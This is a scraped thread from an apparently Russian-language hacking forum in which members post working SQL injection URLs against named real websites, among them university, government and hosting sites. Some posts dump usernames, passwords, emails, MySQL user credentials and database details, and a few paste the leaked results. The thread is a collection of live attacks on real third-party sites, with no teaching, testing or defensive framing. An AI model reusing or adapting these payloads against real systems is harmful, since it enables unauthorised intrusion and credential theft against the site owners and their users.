SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Comrad777

    Comrad777 Elder - Старейшина

    Joined:
    22 Nov 2009
    Messages:
    2,985
    Likes Received:
    1,338
    Reputations:
    832
    http://mynotebook.in/pages.php?page_id=73+and+bin(15)!=1111+union(select+distinct+1,2,3,4,5,6,7,group_concat(uname,':',pword)+from+mnb_members+where+pword+between+0+and+1+order+by+uname+asc)
     
    #13561 Comrad777, 24 Jan 2011
    Last edited: 25 Jan 2011
    2 people like this.
  2. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    PR=3 ТИЦ=170
    http://www.inoxpoint.ru/news.php?nid=74+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+1,1/*
    Database Version: 4.1.25-log
    Database name: wwwinoxpointru_inoxbd
    User name: inoxpoin@localhost
     
    1 person likes this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.csufresno.edu/library/spotlight/item.php?spotlight=1+union+select+1+from(select+count(*),concat((select+concat_ws(0x3a,user,password,file_priv)+from+mysql.user+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a
     
    1 person likes this.
  4. skuller

    skuller New Member

    Joined:
    12 Nov 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.zwerg-schnauzer.info/search.php?Kennel=273+union+select+1,2,3,4,5,6,version(),8,9--

    Host IP: 77.222.40.111
    Web Server: Apache/1.3.37-lk.d (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
    Powered-by: PHP/4.4.4
    DB Server: MySQL >=5
    Current User: rustrake_mini@localhost
     
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://banki.volgograda.ru/index.php?news=-1346%20and%201=2%20union%20select%201,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6,7,8--

    4.0.27-max-log [email protected] madara66 unknown-freebsd4.7
     
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.jewishbelarus.org/index.php?pid=25+union+select+1,2,3,user%28%29,5%20--+
     
    2 people like this.
  7. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.mrotb.com.au/viewproduct.php?sid=-26+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15--
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Во поперло =)

    http://www.1eurohosting.eu/default2.php?page=faq&faqcat_id=&faq_id=-53+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
     
    2 people like this.
  9. BARAKASH

    BARAKASH New Member

    Joined:
    17 Apr 2010
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    http://www.34x.ru/pages.php?id=12+AND+ascii(lower(substring(database(),1,1)))>115+--+

    version: 5.1.42
    database(): analyti4_test
    user(): analyti4
     
  10. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Онлайн игра похоже.
    https://www.piratesdinneradventure.com/tickets/select_show.php?id=2+and((select+ascii(substring(table_name,1,1))+from+information_schema.tables+limit+0,1)=67)+--
     
    #13570 Fooog, 10 Feb 2011
    Last edited: 11 Feb 2011
    1 person likes this.
  11. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.erau.ee/article.php?sid=-147+union+select+1,2,3,4,5,version(),7,8,9,10,11,12--
    http://www.bigbay.bz/imagepop.php?id=-95+union+select+1,2,3,version()--
    http://www.edim.ir/show.php?id=-81+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--.
    http://www.hsg.pl/en/index.php?id=-10+union+select+1,2,3,4,version(),6--
    http://i-bot.com.au/ai2/page.php?sId=-38+union+select+version(),2--
    
     
  12. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.y12.doe.gov/news/release.php?id=201+union+select+1,2,3,4,5,6,7,8,9,10,11--+

    http://www.whwebhosting.com/whmsys/announcements.php?id=-1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/--+

    http://webcolos.de/site/index.php?id=3310&pakketnummer=1'+union+select+1,user(),3,4,5,6,7--+

    http://www.mainbase.de/news.php?id=-6+union+select+1,2,version(),4,5,6,7--+

    http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,3,version(),5,6,7,8--+


    Буагагагага!!!!
     
  13. ka3101

    ka3101 New Member

    Joined:
    12 Feb 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    5
    http://www.colours-shop.com/news/new.php?id=9+union+select+1,version(),user()/*
     
    #13573 ka3101, 14 Feb 2011
    Last edited: 14 Feb 2011
    1 person likes this.
  14. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    http://onlineofG00GLE IS OUTfshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb%27+UNION+SELECT+1,2,3,group_concat(version(),0x3a,user(),0x3a,database())+--+
     
    _________________________
    1 person likes this.
  15. ka3101

    ka3101 New Member

    Joined:
    12 Feb 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    5
    Я добил
    Code:
    http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,login,password,5,6,7,8 FROM users LIMIT 56,1 --+
     
    #13575 ka3101, 15 Feb 2011
    Last edited: 15 Feb 2011
  16. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    http://www.allurebridals.com/index.php?id=-2+union+select+1,2,3,4,group_concat(concat_ws(0x3a,email,password)+separator+0x3c62723e),6,7,8,9,10,11,12,13,14+from+users--

    [email protected]:db295655462:5.0.91-log
     
    1 person likes this.
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.fao.org/news/story/en/item/51042%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)/icode/


    PR9
    Аффтар!!! ЯЯаааду мне!!! =))
     
  18. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.ansdrive.ba/bs/page.php?id=-23+union+select+1,2,version()--
    
    http://www.cybernet.cd/adresse.php?id=23+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    
     
  19. Subscribe

    Subscribe New Member

    Joined:
    8 Jun 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.thevalleypost.com/article.php?id=473-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
     
  20. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://moreprom.ru/news.php?id=-1/**/union/**/select/**/1,user(),COLUMN_NAME/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x6e657773/**/LIMIT/**/0,1--
     
    1 person likes this.
Thread Status:
Not open for further replies.